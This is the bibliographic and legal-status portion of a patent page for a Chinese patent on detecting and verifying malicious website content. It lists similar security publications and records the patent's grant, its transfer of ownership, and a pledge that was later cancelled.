Also Published As
| Publication number | Publication date |
|---|---|
| CN101340434B (zh) | 2011-09-07 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN101340434B (zh) | 网站恶意内容检测与认证方法及系统 | |
| US9680866B2 (en) | System and method for analyzing web content | |
| Kirda et al. | Noxes: a client-side solution for mitigating cross-site scripting attacks | |
| EP2447878B1 (en) | Web based remote malware detection | |
| US9723018B2 (en) | System and method of analyzing web content | |
| Rastogi et al. | Are these Ads Safe: Detecting Hidden Attacks through the Mobile App-Web Interfaces. | |
| CN103634306B (zh) | 网络数据的安全检测方法和安全检测服务器 | |
| Provos et al. | The Ghost in the Browser: Analysis of Web-based Malware. | |
| US9424424B2 (en) | Client based local malware detection method | |
| CN104954372B (zh) | 一种钓鱼网站的取证与验证方法及系统 | |
| CN103368957B (zh) | 对网页访问行为进行处理的方法及系统、客户端、服务器 | |
| RU2697950C2 (ru) | Система и способ выявления скрытого поведения расширения браузера | |
| KR20110095534A (ko) | 웹 서비스의 실시간 취약성 진단 및 결과정보 제공 서비스 시스템 | |
| US20120017274A1 (en) | Web scanning site map annotation | |
| Sanchez-Rola et al. | Dirty clicks: A study of the usability and security implications of click-related behaviors on the web | |
| Kapodistria et al. | An advanced web attack detection and prevention tool | |
| Fietkau et al. | The elephant in the background: A quantitative approachto empower users against web browser fingerprinting | |
| CN103561076B (zh) | 一种基于云的网页挂马实时防护方法及系统 | |
| CN112424778A (zh) | 信息处理装置、信息处理方法、及信息处理程序 | |
| Khodayari et al. | The Great Request Robbery: An Empirical Study of Client-side Request Hijacking Vulnerabilities on the Web | |
| Varshney et al. | Detecting spying and fraud browser extensions: Short paper | |
| Cvitić et al. | Defining cross-site scripting attack resilience guidelines based on BeEF framework simulation | |
| Zhao et al. | Large-scale detection of privacy leaks for BAT browsers extensions in China | |
| Hsu et al. | A Cloud-based Protection approach against JavaScript-based attacks to browsers | |
| Sanyasi | Demographics of Adware and Spyware |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| C10 | Entry into substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| C14 | Grant of patent or utility model | ||
| GR01 | Patent grant | ||
| TR01 | Transfer of patent right |
Effective date of registration: 20170526 Address after: 100086, Haidian District, Zhichun Road, No. 113, 1908, Beijing Patentee after: Beijing micro-stepping Online Technology Co. Ltd. Address before: 100088 Beijing city Haidian District North Ring Road No. 34 - Youth Apartment Room 759 Patentee before: Wang Rui |
|
| PE01 | Entry into force of the registration of the contract for pledge of patent right | ||
| PE01 | Entry into force of the registration of the contract for pledge of patent right |
Denomination of invention: Malicious content detection and verification method and system for network station Effective date of registration: 20190307 Granted publication date: 20110907 Pledgee: Beijing Zhongguancun bank Limited by Share Ltd Pledgor: Beijing micro-stepping Online Technology Co. Ltd. Registration number: 2019110000001 |
|
| PC01 | Cancellation of the registration of the contract for pledge of patent right | ||
| PC01 | Cancellation of the registration of the contract for pledge of patent right |
Date of cancellation: 20210309 Granted publication date: 20110907 Pledgee: Beijing Zhongguancun bank Limited by Share Ltd. Pledgor: BEIJING THREATBOOK TECHNOLOGY Co.,Ltd. Registration number: 2019110000001 |